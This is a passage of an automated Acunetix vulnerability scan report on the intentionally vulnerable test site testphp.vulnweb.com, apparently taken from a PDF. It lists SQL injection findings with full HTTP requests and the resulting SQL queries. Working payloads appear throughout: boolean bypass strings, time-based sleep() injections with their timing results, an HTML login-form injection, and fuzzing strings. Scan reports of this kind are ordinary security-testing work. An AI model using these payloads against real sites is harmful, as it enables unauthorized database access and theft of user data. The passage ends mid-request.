1. ProcessID([string] "1ACUSTART'"ACUEND")
/Mod_Rewrite_Shop/Details/color-printer/3/
Verified vulnerability
Details
Request headers
64
GET /Mod_Rewrite_Shop/Details/color-printer/3/?id=1ACUSTART'"ACUEND HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
User-Agent: 1'"2000
referer: 1'"3000
client-ip: 1'"4000
x-forwarded-for: 1'"5000
accept-language: 1'"6000
via: 1'"7000
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Request headers
65
GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/?id=1ACUSTART'"ACUEND
HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
User-Agent: 1'"2000
referer: 1'"3000
client-ip: 1'"4000
x-forwarded-for: 1'"5000
accept-language: 1'"6000
via: 1'"7000
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Request headers
66
GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2/?id=1ACUSTART'"ACUEND HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
User-Agent: 1'"2000
referer: 1'"3000
client-ip: 1'"4000
x-forwarded-for: 1'"5000
accept-language: 1'"6000
via: 1'"7000
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Request headers
67
GET /product.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: https://www.google.com/search?hl=en&q=testing
Cookie: login=1ACUSTART'"2hLJVACUEND
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Request headers
68
GET /product.php?pic=1ACUSTART'"HdhEDACUEND HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Request headers
69
GET /search.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: https://www.google.com/search?hl=en&q=testing
Cookie: login=1ACUSTART'"9rELNACUEND
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Request headers
70
POST /search.php?test=query HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 44
Host: testphp.vulnweb.com
Connection: Keep-alive
goButton=go&searchFor=1ACUSTART'"9BDCVACUEND
Source file: /hj/var/www//search.php, line: 70
Additional details
SQL query:
SELECT a.*, b.aname, b.artist_id, c.cname
FROM pictures a, artists b, categ c
WHERE a.cat_id=c.cat_id AND a.a_id=b.artist_id AND (LOCATE('1ACUSTART'"9BDCVACUEND',
a.title) > 0 OR LOCATE('1ACUSTART'"9BDCVACUEND', a.pshort) > 0)
Request headers
71
POST /search.php?test=1ACUSTART'"2qdbeACUEND HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 25
Host: testphp.vulnweb.com
Connection: Keep-alive
goButton=go&searchFor=the
Source file: /hj/var/www//search.php, line: 60
Additional details
SQL query: SELECT * FROM guestbook WHERE sender='1ACUSTART'"2qdbeACUEND';
Request headers
72
POST /secured/newuser.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 205
Host: testphp.vulnweb.com
Connection: Keep-alive
signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%40email.
tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-
0606&urname=ghovjnjv&uuname=1ACUSTART'"dU78RACUEND
Source file: /hj/var/www//secured/newuser.php, line: 16
Additional details
SQL query: SELECT * FROM users WHERE uname='1ACUSTART'"dU78RACUEND'
Request headers
73
POST /sendcommand.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 83
Host: testphp.vulnweb.com
Connection: Keep-alive
cart_id=1ACUSTART'"9YkyyACUEND&submitForm=place%20a%20command%20for%20these%20items
Source file: /hj/var/www//sendcommand.php, line: 17
Additional details
SQL query: DELETE FROM carts WHERE cart_id='1ACUSTART'"9YkyyACUEND'
Request headers
74
GET /userinfo.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: https://www.google.com/search?hl=en&q=testing
Cookie: login=1ACUSTART'"CmlXxACUEND
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Tests performed:
Original value: 1
Proof of Exploit
acuart
Request headers
75
POST /userinfo.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 61
Host: testphp.vulnweb.com
Connection: Keep-alive
pass=-1'%20OR%203*2*1=6%20AND%20000591=000591%20--%20&uname=1
/userinfo.php
Verified vulnerability
Details
URL encoded POST input pass was set to 1ACUSTART'"P6BeeACUEND
Request headers
POST /userinfo.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 42
Host: testphp.vulnweb.com
Connection: Keep-alive
pass=1ACUSTART'"P6BeeACUEND&uname=ghovjnjv
Source file: /hj/var/www//userinfo.php, line: 8
76
Additional details
SQL query: SELECT * FROM users WHERE uname='ghovjnjv' AND pass='1ACUSTART'"P6BeeACUEND'
Request headers
POST /userinfo.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 111
Host: testphp.vulnweb.com
Connection: Keep-alive
uaddress=1ACUSTART'"oDADGACUEND&ucc=777&uemail=matheusdaocu%40gmail.com&update=update&uph
one=%2B555%20666666666
Source file: /hj/var/www//userinfo.php, line: 32
Additional details
SQL query:
UPDATE users
SET
name = '',
cc = '777',
address = '1ACUSTART'"oDADGACUEND',
email = 'matheusdaocu@gmail.com',
phone = '+555 666666666'
WHERE
uname = 'test'
77
/userinfo.php
Verified vulnerability
Details
URL encoded POST input uaddress was set to 1ACUSTART'"qFHL3ACUEND
Request headers
POST /userinfo.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 127
Host: testphp.vulnweb.com
Connection: Keep-alive
uaddress=1ACUSTART'"qFHL3ACUEND&ucc=777&uemail=matheusdaocu%40gmail.com&update=update&uph
one=%2B555%20666666666&urname=ghovjnjv
Source file: /hj/var/www//userinfo.php, line: 32
Additional details
SQL query:
UPDATE users
SET
name = 'ghovjnjv',
cc = '777',
address = '1ACUSTART'"qFHL3ACUEND',
email = 'matheusdaocu@gmail.com',
phone = '+555 666666666'
WHERE
uname = 'test'
78
URL encoded POST input ucc was set to (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+
(select(0)from(select(sleep(6)))v)+"*/
Tests performed:
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
=> 15.144
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
=> 15.147
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ =>
0.14
(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/ =>
3.144
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ =>
6.138
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ =>
0.154
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ =>
6.16
79
POST /userinfo.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 926
Host: testphp.vulnweb.com
Connection: Keep-alive
uaddress=
<div%20id="content">%0D%0A%09<div%20class="story">%0D%0A%09<h3>If%20you%20are%20already%2
0registered%20please%20enter%20your%20login%20information%20below:</h3>
<br>%0D%0A%09<form%20name="loginform"%20method="post"%20action="userinfo.php">%0D%0A%09<t
able%20cellpadding="4"%20cellspacing="1">%0D%0A%09%09<tr><td>Username%20:%20</td><td>
<input%20name="uname"%20type="text"%20size="20"%20style="width:120px;"></td>
</tr>%0D%0A%09%09<tr><td>Password%20:%20</td><td>
<input%20name="pass"%20type="password"%20size="20"%20style="width:120px;"></td>
</tr>%0D%0A%09%09<tr><td%20colspan="2"%20align="right">
<input%20type="submit"%20value="login"%20style="width:75px;"></td>
</tr>%0D%0A%09</table>%0D%0A%09</form>%0D%0A%20%20%09</div>&ucc=
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'"%2B(select
(0)from(select(sleep(6)))v)%2B"*/&uemail=matheusdaocu%40gmail.com&update=update&uphone=%2
B555%20666666666
/userinfo.php
Verified vulnerability
Details
URL encoded POST input uemail was set to 1ACUSTART'"VzXqAACUEND
Request headers
80
POST /userinfo.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 805
Host: testphp.vulnweb.com
Connection: Keep-alive
uaddress=
<div%20id="content">%0D%0A%09<div%20class="story">%0D%0A%09<h3>If%20you%20are%20already%2
0registered%20please%20enter%20your%20login%20information%20below:</h3>
<br>%0D%0A%09<form%20name="loginform"%20method="post"%20action="userinfo.php">%0D%0A%09<t
able%20cellpadding="4"%20cellspacing="1">%0D%0A%09%09<tr><td>Username%20:%20</td><td>
<input%20name="uname"%20type="text"%20size="20"%20style="width:120px;"></td>
</tr>%0D%0A%09%09<tr><td>Password%20:%20</td><td>
<input%20name="pass"%20type="password"%20size="20"%20style="width:120px;"></td>
</tr>%0D%0A%09%09<tr><td%20colspan="2"%20align="right">
<input%20type="submit"%20value="login"%20style="width:75px;"></td>
</tr>%0D%0A%09</table>%0D%0A%09</form>%0D%0A%20%20%09</div>&ucc=777&uemail=1ACUSTART'"VzX
qAACUEND&update=update&uphone=%2B555%20666666666
Source file: /hj/var/www//userinfo.php, line: 32
Additional details
81
SQL query:
UPDATE users
SET
name = '',
cc = '777',
address = '<div id="content">
<div class="story">
<h3>If you are already registered please enter your login information below:</h3><br>
</table>
</form>
</div>',
email = '1ACUSTART'"VzXqAACUEND',
phone = '+555 666666666'
WHERE
uname = 'test'
Request headers
82
POST /userinfo.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 821
Host: testphp.vulnweb.com
Connection: Keep-alive
uaddress=
<div%20id="content">%0D%0A%09<div%20class="story">%0D%0A%09<h3>If%20you%20are%20already%2
0registered%20please%20enter%20your%20login%20information%20below:</h3>
<br>%0D%0A%09<form%20name="loginform"%20method="post"%20action="userinfo.php">%0D%0A%09<t
able%20cellpadding="4"%20cellspacing="1">%0D%0A%09%09<tr><td>Username%20:%20</td><td>
<input%20name="uname"%20type="text"%20size="20"%20style="width:120px;"></td>
</tr>%0D%0A%09%09<tr><td>Password%20:%20</td><td>
<input%20name="pass"%20type="password"%20size="20"%20style="width:120px;"></td>
</tr>%0D%0A%09%09<tr><td%20colspan="2"%20align="right">
<input%20type="submit"%20value="login"%20style="width:75px;"></td>
</tr>%0D%0A%09</table>%0D%0A%09</form>%0D%0A%20%20%09</div>&ucc=777&uemail=1ACUSTART'"iEB
0PACUEND&update=update&uphone=%2B555%20666666666&urname=ghovjnjv
Source file: /hj/var/www//userinfo.php, line: 32
Additional details
83
SQL query:
UPDATE users
SET
name = 'ghovjnjv',
cc = '777',
address = '<div id="content">
<div class="story">
<h3>If you are already registered please enter your login information below:</h3><br>
</table>
</form>
</div>',
email = '1ACUSTART'"iEB0PACUEND',
phone = '+555 666666666'
WHERE
uname = 'test'
84
URL encoded POST input uname was set to -1' OR 3*2*1=6 AND 000690=000690 --
Tests performed:
Original value: 1
Proof of Exploit
acuart
Request headers
POST /userinfo.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 61
Host: testphp.vulnweb.com
Connection: Keep-alive
pass=1&uname=-1'%20OR%203*2*1=6%20AND%20000690=000690%20--%20
/userinfo.php
Verified vulnerability
Details
URL encoded POST input uname was set to 1ACUSTART'"qZNPcACUEND
Request headers
85
POST /userinfo.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 50
Host: testphp.vulnweb.com
Connection: Keep-alive
pass=g00dPa%24%24w0rD&uname=1ACUSTART'"qZNPcACUEND
Source file: /hj/var/www//userinfo.php, line: 8
Additional details
SQL query: SELECT * FROM users WHERE uname='1ACUSTART'"qZNPcACUEND' AND
pass='g00dPa$$w0rD'
Request headers
86
POST /userinfo.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 811
Host: testphp.vulnweb.com
Connection: Keep-alive
uaddress=
<div%20id="content">%0D%0A%09<div%20class="story">%0D%0A%09<h3>If%20you%20are%20already%2
0registered%20please%20enter%20your%20login%20information%20below:</h3>
<br>%0D%0A%09<form%20name="loginform"%20method="post"%20action="userinfo.php">%0D%0A%09<t
able%20cellpadding="4"%20cellspacing="1">%0D%0A%09%09<tr><td>Username%20:%20</td><td>
<input%20name="uname"%20type="text"%20size="20"%20style="width:120px;"></td>
</tr>%0D%0A%09%09<tr><td>Password%20:%20</td><td>
<input%20name="pass"%20type="password"%20size="20"%20style="width:120px;"></td>
</tr>%0D%0A%09%09<tr><td%20colspan="2"%20align="right">
<input%20type="submit"%20value="login"%20style="width:75px;"></td>
</tr>%0D%0A%09</table>%0D%0A%09</form>%0D%0A%20%20%09</div>&ucc=777&uemail=matheusdaocu%4
0gmail.com&update=update&uphone=1ACUSTART'"OhepyACUEND
Source file: /hj/var/www//userinfo.php, line: 32
Additional details
87
SQL query:
UPDATE users
SET
name = '',
cc = '777',
address = '<div id="content">
<div class="story">
<h3>If you are already registered please enter your login information below:</h3><br>
</table>
</form>
</div>',
email = 'matheusdaocu@gmail.com',
phone = '1ACUSTART'"OhepyACUEND'
WHERE
uname = 'test'
Request headers
88
POST /userinfo.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 827
Host: testphp.vulnweb.com
Connection: Keep-alive
uaddress=
<div%20id="content">%0D%0A%09<div%20class="story">%0D%0A%09<h3>If%20you%20are%20already%2
0registered%20please%20enter%20your%20login%20information%20below:</h3>
<br>%0D%0A%09<form%20name="loginform"%20method="post"%20action="userinfo.php">%0D%0A%09<t
able%20cellpadding="4"%20cellspacing="1">%0D%0A%09%09<tr><td>Username%20:%20</td><td>
<input%20name="uname"%20type="text"%20size="20"%20style="width:120px;"></td>
</tr>%0D%0A%09%09<tr><td>Password%20:%20</td><td>
<input%20name="pass"%20type="password"%20size="20"%20style="width:120px;"></td>
</tr>%0D%0A%09%09<tr><td%20colspan="2"%20align="right">
<input%20type="submit"%20value="login"%20style="width:75px;"></td>
</tr>%0D%0A%09</table>%0D%0A%09</form>%0D%0A%20%20%09</div>&ucc=777&uemail=matheusdaocu%4
0gmail.com&update=update&uphone=1ACUSTART'"d6ToCACUEND&urname=ghovjnjv
Source file: /hj/var/www//userinfo.php, line: 32
Additional details
89
SQL query:
UPDATE users
SET
name = 'ghovjnjv',
cc = '777',
address = '<div id="content">
<div class="story">
<h3>If you are already registered please enter your login information below:</h3><br>
</table>
</form>
</div>',
email = 'matheusdaocu@gmail.com',
phone = '1ACUSTART'"d6ToCACUEND'
WHERE
uname = 'test'
Severity Medium
Reported by module /Scripts/PerFolder/htaccess_File_Readable.script
Description
This directory contains an .htaccess file that is readable. This may indicate a server misconfiguration. htaccess files are
designed to be parsed by web server and should not be directly accessible. These files could contain sensitive information
that could help an attacker to conduct further attacks. It's recommended to restrict access to this file.
Impact
Recommendation
Restrict access to the .htaccess file by adjusting the web server configuration.
Affected items
90
/Mod_Rewrite_Shop/
Verified vulnerability
Details
Request headers
GET /Mod_Rewrite_Shop/.htaccess HTTP/1.1
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Severity Medium
Reported by module /Scripts/PerScheme/Error_Message.script
Description
Application error or warning messages may expose sensitive information about an application's internal workings to an
attacker.
Acunetix found an error or warning message that may disclose sensitive information. The message may also contain the
location of the file that produced an unhandled exception. Consult the 'Attack details' section for more information about the
affected page.
Impact
Error messages may disclose sensitive information which can be used to escalate attacks.
Recommendation
Verify that this page is disclosing error or warning messages and properly configure the application to log errors to a file
instead of displaying the error to the user.
References
Affected items
/listproducts.php
Details
91
URL encoded GET input artist was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'ð ¡
Pattern found:
Request headers
GET /listproducts.php?artist=12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡 HTTP/1.1
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/listproducts.php
Details
URL encoded GET input cat was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'ð ¡
Pattern found:
Request headers
GET /listproducts.php?cat=12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡 HTTP/1.1
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/secured/newuser.php
Details
92
URL encoded POST input uuname was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'ð ¡
Pattern found:
Request headers
POST /secured/newuser.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 225
Host: testphp.vulnweb.com
Connection: Keep-alive
signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%40email.
tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-
0606&urname=ghovjnjv&uuname=12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡
/showimage.php
Details
URL encoded GET input file was set to acu1951%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca1951
Pattern found:
Request headers
93
GET /showimage.php?file=acu1951%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca1951&size=160
HTTP/1.1
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/userinfo.php
Details
URL encoded POST input uaddress was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'ð ¡
Pattern found:
Request headers
POST /userinfo.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 131
Host: testphp.vulnweb.com
Connection: Keep-alive
uaddress=12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡
&ucc=777&uemail=matheusdaocu%40gmail.com&update=update&uphone=%2B555%20666666666
/userinfo.php
Details
94
URL encoded POST input ucc was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'ð ¡
Pattern found:
Request headers
POST /userinfo.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 846
Host: testphp.vulnweb.com
Connection: Keep-alive
uaddress=
<div%20id="content">%0D%0A%09<div%20class="story">%0D%0A%09<h3>If%20you%20are%20already%2
0registered%20please%20enter%20your%20login%20information%20below:</h3>
<br>%0D%0A%09<form%20name="loginform"%20method="post"%20action="userinfo.php">%0D%0A%09<t
able%20cellpadding="4"%20cellspacing="1">%0D%0A%09%09<tr><td>Username%20:%20</td><td>
<input%20name="uname"%20type="text"%20size="20"%20style="width:120px;"></td>
</tr>%0D%0A%09%09<tr><td>Password%20:%20</td><td>
<input%20name="pass"%20type="password"%20size="20"%20style="width:120px;"></td>
</tr>%0D%0A%09%09<tr><td%20colspan="2"%20align="right">
<input%20type="submit"%20value="login"%20style="width:75px;"></td>
</tr>%0D%0A%09</table>%0D%0A%09</form>%0D%0A%20%20%09</div>&ucc=12345'"\'\");|]*%00{%0d%0
a<%00>%bf%27'💡&uemail=matheusdaocu%40gmail.com&update=update&uphone=%2B555%20666666666
/userinfo.php
Details
URL encoded POST input uemail was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'ð ¡
Pattern found:
Request headers
95
POST /userinfo.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 825
Host: testphp.vulnweb.com
Connection: Keep-alive
uaddress=
<div%20id="content">%0D%0A%09<div%20class="story">%0D%0A%09<h3>If%20you%20are%20already%2
0registered%20please%20enter%20your%20login%20information%20below:</h3>
<br>%0D%0A%09<form%20name="loginform"%20method="post"%20action="userinfo.php">%0D%0A%09<t
able%20cellpadding="4"%20cellspacing="1">%0D%0A%09%09<tr><td>Username%20:%20</td><td>
<input%20name="uname"%20type="text"%20size="20"%20style="width:120px;"></td>
</tr>%0D%0A%09%09<tr><td>Password%20:%20</td><td>
<input%20name="pass"%20type="password"%20size="20"%20style="width:120px;"></td>
</tr>%0D%0A%09%09<tr><td%20colspan="2"%20align="right">
<input%20type="submit"%20value="login"%20style="width:75px;"></td>
</tr>%0D%0A%09</table>%0D%0A%09</form>%0D%0A%20%20%09</div>&ucc=777&uemail=12345'"\'\");|
]*%00{%0d%0a<%00>%bf%27'💡&update=update&uphone=%2B555%20666666666
/userinfo.php
Details
URL encoded POST input uphone was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'ð ¡
Pattern found:
Request headers
96
POST /userinfo.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 831
Host: testphp.vulnweb.com
Connection: Keep-alive
uaddress=
<div%20id="content">%0D%0A%09<div%20class="story">%0D%0A%09<h3>If%20you%20are%20already%2
0registered%20please%20enter%20your%20login%20information%20below:</h3>
<br>%0D%0A%09<form%20name="loginform"%20method="post"%20action="userinfo.php">%0D%0A%09<t
able%20cellpadding="4"%20cellspacing="1">%0D%0A%09%09<tr><td>Username%20:%20</td><td>
<input%20name="uname"%20type="text"%20size="20"%20style="width:120px;"></td>
</tr>%0D%0A%09%09<tr><td>Password%20:%20</td><td>
<input%20name="pass"%20type="password"%20size="20"%20style="width:120px;"></td>
</tr>%0D%0A%09%09<tr><td%20colspan="2"%20align="right">
<input%20type="submit"%20value="login"%20style="width:75px;"></td>
</tr>%0D%0A%09</table>%0D%0A%09</form>%0D%0A%20%20%09</div>&ucc=777&uemail=matheusdaocu%4
0gmail.com&update=update&uphone=12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡
/userinfo.php
Details
URL encoded POST input urname was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'ð ¡
Pattern found:
Request headers
97
POST /userinfo.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 857
Host: testphp.vulnweb.com
Connection: Keep-alive
uaddress=
